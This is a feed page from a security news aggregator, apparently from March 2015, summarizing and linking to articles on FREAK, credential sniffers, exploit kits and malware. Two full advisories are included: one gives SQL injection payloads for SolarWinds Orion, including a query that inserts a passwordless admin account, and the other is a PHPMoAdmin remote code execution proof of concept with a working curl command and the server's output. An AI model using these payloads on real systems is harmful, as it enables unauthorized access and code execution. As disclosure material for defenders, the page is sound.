Quantcast
Channel: BOT24
Viewing all 8064 articles
Browse latest View live

Attack of the week: FREAK (or 'factoring the NSA for fun and profit')

March 3, 2015, 2:32 pm
$
0
0
This is the story of how a handful of cryptographers 'hacked' the NSA. It's also a story of encryption backdoors, and why they never quite work out the way you want them to.

more here.......http://blog.cryptographyengineering.com/2015/03/attack-of-week-freak-or-factoring-nsa.html

and more here......https://www.freakattack.com/
Search

net-creds: Sniffs sensitive data from interface or pcap

March 3, 2015, 11:30 am
$
0
0
Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification. Screenshots: http://imgur.com/opQo7Bb http://imgur.com/Kl5I6Ju

Sniffs
URLs visited
POST loads sent
HTTP form logins/passwords
HTTP basic auth logins/passwords
HTTP searches
FTP logins/passwords
IRC logins/passwords
POP logins/passwords
IMAP logins/passwords
Telnet logins/passwords
SMTP logins/passwords
SNMP community string
NTLMv1/v2 all supported protocols like HTTP, SMB, LDAP, etc
Kerberos


more here........https://github.com/DanMcInerney/net-creds

binvis.io - a browser-based tool for visualising binary data

March 3, 2015, 11:31 am
$
0
0
Over the years, I've written a number of posts on this blog on the topic of binary data visualisation. I looked at using space-filling curves to understand the structure of binary data, I've showed how entropy visualisation lets you trivially pick out compressed and encrypted sections, and I've drawn pretty pictures of malware. Unfortunately the tools I wrote all produced static images, which made making practical use a pain. You really need interactivity to be able to combine visual exploration with inspection of the actual underlying data, and to let you easily export interesting sections.

more here............http://corte.si/posts/binvis/announce/index.html

Airodump-NG Scan Visualizer ver 0.1

March 3, 2015, 12:49 pm
$
0
0
We all love Airodump-NG! I am personally a fan of the entire Aircrack-NG tool suite and the fantastic work done by Mister_X over the years. As most of you know Airodump-NG can export the scan data as a CSV or a Kismet compatible Netxml file. The Airodump-NG Scan Visualizer takes this CSV file and allows you to filter and play around with this scan data in interesting ways.

Getting Started with the Airodump-NG Scan Visualizer

more here.........http://hackoftheday.securitytube.net/2015/03/airodump-ng-scan-visualizer-ver-01.html

Hospital Sues Bank of America Over Million-Dollar Cyberheist

March 3, 2015, 12:55 pm
$
0
0
A public hospital in Washington state is suing Bank of America to recoup some of the losses from a $1.03 million cyberheist that the healthcare organization suffered in 2013.

more here........http://krebsonsecurity.com/2015/03/hospital-sues-bank-of-america-over-million-dollar-cyberheist/

GAO 46 Page Document:FAA Needs to Address Weaknesses in Air Traffic Control Systems

March 3, 2015, 12:58 pm
$
0
0
While the Federal Aviation Administration (FAA) has taken steps to protect its air
traffic control systems from cyber-based and other threats, significant security
control weaknesses remain, threatening the agency’s ability to ensure the safe
and uninterrupted operation of the national airspace system (NAS). These
include weaknesses in controls intended to prevent, limit, and detect
unauthorized access to computer resources, such as controls for protecting
system boundaries, identifying and authenticating users, authorizing users to
access systems, encrypting sensitive data, and auditing and monitoring activity
on FAA’s systems. Additionally, shortcomings in boundary protection controls
between less-secure systems and the operational NAS environment increase the
risk from these weaknesses.

more here.....http://www.gao.gov/assets/670/668169.pdf

Monitoring tools: user notification required

March 3, 2015, 2:29 pm
$
0
0
The Microsoft Malware Protection Center (MMPC) helps to keep Windows customers in control of their computing experience, information, and privacy. We use objective criteria to help protect customers against malware and unwanted software. This means helping to protect you against monitoring software that maliciously collects and provides unauthorized access to your private data.

We are aware of social engineering campaigns that target users in Eastern Europe and Brazil using monitoring software. The technique that we have observed involves both:

Concealing monitoring tools inside application or games available for download from file-sharing websites.
Collecting private data using email accounts or ftp servers, once the bundled application has been opened.

more here..........http://blogs.technet.com/b/mmpc/archive/2015/03/03/monitoring-tools-user-notification-required.aspx

Threat Spotlight from Cisco on Previously Discussed Exploit Kit: Angler Lurking in the Domain Shadows

March 3, 2015, 2:34 pm
$
0
0
Over the last several months Talos researchers have been monitoring a massive exploit kit campaign that is utilizing hijacked registrant accounts to create large amounts of subdomains for both initial redirection and exploitation. This campaign has been largely attributed to Angler Exploit Kit with fileless exploits serving various malicious payloads.

The use of hijacked accounts lead to a larger research project into the use of hijacked registrant accounts. During this research the earliest examples were found from a 2011 campaign with sporadic usage until December 2014. Since December 2014 more than 75% of the subdomain activity has occurred indicating a major shift in approach. This behavior has been covered before which discussed some of the older campaigns as well as the hosting indicators (ASN) of the groups making use of the subdomains.

more here..........http://blogs.cisco.com/security/talos/angler-domain-shadowing
Search

Multiple SQL injections in core Orion service affecting many Solarwinds products (CVE-2014-9566)

March 3, 2015, 3:07 pm
$
0
0
I found a couple SQL injection vulnerabilities in the core Orion service
used in most of the Solarwinds products (SAM, IPAM, NPM, NCM, etc…). This
service provides a consistent configuration and authentication layer across
the products.

To be exact, the vulnerable applications and versions are:

Network Performance Monitor -- < 11.5
NetFlow Traffic Analyzer -- < 4.1
Network Configuration Manager -- < 7.3.2
IP Address Manager -- < 4.3
User Device Tracker -- < 3.2
VoIP & Network Quality Manager -- < 4.2
Server & Application Monitor -- < 6.2
Web Performance Monitor -- < 2.2

At first glance, the injections are only available to admins, as the
requests used are on the Manage Accounts page. However, it seems there is
no real ACL check on the GetAccounts and GetAccountGroups endpoints of the
AccountManagement.asmx service, which means that even authenticating as
Guest allows for exploitation. By default, the Guest account has no
password and is enabled.

On both the GetAccounts and GetAccountGroups endpoints, the 'sort' and
'dir' parameters are susceptible to boolean-/time-based, and stacked
injections. By capturing the AJAX requests made by an admin user to these
endpoints, authenticating as Guest and replacing the admin cookie with the
Guest cookie, you can still make a successful request, and thus a
successful exploitation vector for any authenticated user.

Being a stacked injection, this becomes a privilege escalation at the very
least, as an attacker is able to insert their own admin user. A pull
request for a Metasploit module which should achieve this on any product
using the Orion service as the core authentication management system, using
the GetAccounts endpoint, has been made (
https://github.com/rapid7/metasploit-framework/pull/4836). By default, the
module attempts to authenticate as the Guest user with a blank password,
then exploit the SQL injection to insert a new admin with a blank password.

I am not sure if the non-trial versions allow you to specify your own SQL
server, but the trials install a SQL Server Express instance. The SQL user
that the application uses is not an administrator, and the xp_cmd_shell
stored procedure is unavailable.

Within the GetAccounts endpoint:

Parameter: dir (GET)

    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause
    Payload: sort=Accounts.AccountID&dir=ASC,(SELECT (CASE WHEN (5791=5791)
THEN CHAR(65)+CHAR(83)+CHAR(67) ELSE 5791*(SELECT 5791 FROM
master..sysdatabases) END))

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: sort=Accounts.AccountID&dir=ASC; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: sort=Accounts.AccountID&dir=ASC WAITFOR DELAY '0:0:5'--


Parameter: sort (GET)

    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter
replace (original value)
    Payload: sort=(SELECT (CASE WHEN (8998=8998) THEN
CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(115)+CHAR(46)+CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(73)+CHAR(68)
ELSE 8998*(SELECT 8998 FROM master..sysdatabases) END))&dir=ASC

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: sort=Accounts.AccountID; WAITFOR DELAY '0:0:5'--&dir=ASC

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: sort=Accounts.AccountID WAITFOR DELAY '0:0:5'--&dir=ASC



Within the GetAccountGroups endpoint, very similar injection techniques are
available:

Parameter: dir (GET)

    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause
    Payload: sort=Accounts.GroupPriority&dir=ASC,(SELECT (CASE WHEN
(8799=8799) THEN CHAR(65)+CHAR(83)+CHAR(67) ELSE 8799*(SELECT 8799 FROM
master..sysdatabases) END))

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: sort=Accounts.GroupPriority&dir=ASC; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: sort=Accounts.GroupPriority&dir=ASC WAITFOR DELAY '0:0:5'--


Parameter: sort (GET)

    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter
replace (original value)
    Payload: sort=(SELECT (CASE WHEN (1817=1817) THEN
CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(115)+CHAR(46)+CHAR(71)+CHAR(114)+CHAR(111)+CHAR(117)+CHAR(112)+CHAR(80)+CHAR(114)+CHAR(105)+CHAR(111)+CHAR(114)+CHAR(105)+CHAR(116)+CHAR(121)
ELSE 1817*(SELECT 1817 FROM master..sysdatabases) END))&dir=ASC

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: sort=Accounts.GroupPriority; WAITFOR DELAY '0:0:5'--&dir=ASC

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: sort=Accounts.GroupPriority WAITFOR DELAY '0:0:5'--&dir=ASC


An example injection to insert an admin user named notadmin with a blank
password using the 'dir' parameter would be:

ASC;insert into accounts values ('notadmin', '127-510823478-74417-8',
'/+PA4Zck3arkLA7iwWIugnAEoq4ocRsYjF7lzgQWvJc+pepPz2a5z/L1Pz3c366Y/CasJIa7enKFDPJCWNiKRg==',
'Feb  1 2100 12:00AM', 'Y', 'notadmin', 1, '', '', 1, -1, 8, -1, 4, 0, 0,
0, 0, 0, 0, 'Y', 'Y', 'Y', 'Y', 'Y', '', '', 0, 0, 0, 'N', 'Y', '', 1, '',
0, '');

This vulnerability was reported to Solarwinds on Dec 8th, 2014 and was
assigned the CVE identifier CVE-2014-9566. A coordinated disclosure date of
Feb 24th, 2015 was chosen by both parties. I would like to thank Rob Hock,
Group Product Manager – Network Management at Solarwinds for the easy
coordination (you should still have a bug bounty though!).


Authored by Brandon Perry

PHPMoAdmin Unauthorized Remote Code Execution (0-Day) PoC

March 3, 2015, 3:09 pm
$
0
0
######################################################################
#  _     ___  _   _  ____  ____    _  _____
#  | |   / _ \| \ | |/ ___|/ ___|  / \|_   _|
#  | |  | | | |  \| | |  _| |     / _ \ | |
#  | |__| |_| | |\  | |_| | |___ / ___ \| |
#  |_____\___/|_| \_|\____|\____/_/   \_\_|
#
# PHPMoAdmin Unauthorized Remote Code Execution (0-Day)
# Website : http://www.phpmoadmin.com/
# Exploit Author : @u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio
# Release dates : March 3, 2015
#
# Special Thanks to 2600 Thailand group
https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/
#
########################################################################

[+] Description
============================================================
PHPMoAdmin is a MongoDB administration tool for PHP built on a
stripped-down version of the Vork high-performance framework.

[+] Exploit
============================================================
Someone was trying to sale this shit for 3000usd lolz

$ curl "http://path.to/moadmin.php" -d "object=1;system('id');exit"

[+] Proof-of-Concept
============================================================
PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7

POST /moadmin/moadmin.php HTTP/1.1
Host: 192.168.33.10
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0)
Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

object=1;system('id;ls -lha');exit

HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 16:57:40 GMT
Server: Apache/2.4.7 (Ubuntu)
Set-Cookie: PHPSESSID=m0ap55aonsj5ueph7hgku0elb1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 223
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 116K
drwxr-xr-x 1 longcat longcat  102 Mar  3 16:55 .
drwxr-xr-x 6 root    root    4.0K Mar  3 16:17 ..
-rw-rw-r-- 1 longcat longcat 112K Mar  3 16:55 moadmin.php

[+] Vulnerability Analysis
============================================================
Filename: moadmin.php
1. create new moadminComponent object
1977: $mo = new moadminComponent;

2. if the http-post parameter 'object' is set
738: class moadminComponent {
...
762: public function __construct() {
...
786: if (isset($_POST['object'])) {
787:    if (self::$model->saveObject($_GET['collection'],
$_POST['object'])) {
...

3. evaluate the value of 'object' as PHP code
692: public function saveObject($collection, $obj) {
693:    eval('$obj=' . $obj . ';'); //cast from string to array

An Example of Evolving Obfuscation

March 3, 2015, 3:16 pm
$
0
0
Since May of 2014, I've been tracking a particular group that uses the Sweet Orange exploit kit to deliver malware.  This group also uses obfuscation to make it harder to detect the infection chain of events.

more here.........https://isc.sans.edu/forums/diary/An+Example+of+Evolving+Obfuscation/19403

PCAP of the traffic: 2015-03-03-traffic-analysis-exercise.pcap

March 3, 2015, 5:25 pm
$
0
0
SCENARIO

Time for another shift at your organization's Security Operations Center (SOC).  You review some EmergingThreats alerts for Angler exploit kit on a host within your network.

You review the pcap and document the following here...........http://malware-traffic-analysis.net/2015/03/03/index.html

C99Shell not dead

March 3, 2015, 5:33 pm
$
0
0
I recently got contacted on Twitter in regards to a hacked webpage:

After I received the files two things became apparent:

- the webserver (and thus the website) was infected with C99shell
- the webserver was infected with other PHP backdoors

more here.........http://bartblaze.blogspot.com/2015/03/c99shell-not-dead.html

Android Application hacking with Insecure Bank Part 2

March 3, 2015, 5:48 pm
$
0
0
In the previous article, we looked at setting up a mobile pentesting platform for Android applications. By now, you must have set up an emulator using genymotion and installed all the android command line tools along with some other additonal tools (drozer, dex2jar, apktool). In this article, we will look at some information gathering techniques. We will see how we can decompile an application to its java source, analyze the signature of the application and many more things.

more here........http://resources.infosecinstitute.com/android-application-hacking-insecure-bank-part-2/

SuperFish SSL Sniffing

March 4, 2015, 12:19 am
$
0
0
Since everyone has blogged about SuperFish and other Komodia products we can skip all that and get to the good stuff. It’s extremely easy to sniff SSL traffic and get headers, cookies, whatever you want from an HTTPS request if you are able to control the traffic.

more here..........http://pashakravtsov.com/2015/03/03/SuperFish-SSL-Sniffing/
Search

What is noninterference, and how do we enforce it?

March 4, 2015, 12:29 am
$
0
0
In this post I discuss a program security property called noninterference. I motivate why you might like it if your program satisfied noninterference, and show that the property is fundamental to many areas beyond just security. I also explore some programming languages and tools that might help you enforce noninterference, noting that while tainting analysis won’t get you the whole way there, research tools that attempt to do better have their own problems. I conclude with some suggestions for future research, in particular with the idea that testing noninterference may be a practical approach.

more here..........http://www.pl-enthusiast.net/2015/03/03/noninterference/

Deobfuscating a Wicked-Looking Script

March 4, 2015, 12:36 am
$
0
0
Bart Blaze, one of my security researcher friends passed along this PHP script to me. Let’s have a look here..........http://www.kahusecurity.com/2015/deobfuscating-a-wicked-looking-script/

toolsmith: Faraday IPE - When Tinfoil Won’t Work for Pentesting

March 4, 2015, 1:21 am
$
0
0
I love me some tinfoil-hat-wearing conspiracy theorists, nothing better than sparking up a lively conversation with a “Hey man, what was that helicopter doing over your house?” and you’re off to the races. Me, I just operate on the premise that everyone is out to get me and I’m good to go. For the more scientific amongst you, there’s always a Faraday option. What? You don’t have a Faraday Cage in your house? You’re going to need more tinfoil. :-)

more here.......http://holisticinfosec.blogspot.com/2015/03/toolsmith-faraday-ipe-when-tinfoil-wont.html

PwnPOS: Old Undetected PoS Malware Still Causing Havoc

March 4, 2015, 1:23 am
$
0
0
We have been observing a new malware that infects point-of-sale (POS) systems. This malware may have been active since 2013, possibly earlier. Trend Micro will be naming this new malware family as PwnPOS to differentiate it from other known PoS malware families.

In this blog post, we will discuss the technical details of this PoS malware. Researchers and incident response teams can add our findings to their growing number of PoS malware indicators.

more here........http://blog.trendmicro.com/trendlabs-security-intelligence/pwnpos-old-undetected-pos-malware-still-causing-havoc/

ElasticSearch Groovy script remote code execution vulnerability analysis (CVE-2015-1427)

March 4, 2015, 1:34 am
$
0
0
ElasticSearch is a JAVA development of search engine analysis. In 2014, had been discovered over a remote code execution vulnerability (CVE-2014-3120), loopholes in the script to query module, because the search engine supports the use of scripting code (MVEL), as an expression for data manipulation, an attacker could MVEL java code to execute arbitrary structure, then the scripting language engine replaced Groovy, and joined the sandbox controlled dangerous code will be blocked, the results of this due to the sandbox restrictions are not strict, lead to remote code execution, currently not online see open poc, after some research and found that the use patterns, let's look at how the vulnerability is generated.


more here, so make use of whatever translation software you find somewhat effective, as this is in Chinese .......http://drops.wooyun.org/papers/5107
Viewing all 8064 articles
Browse latest View live
Search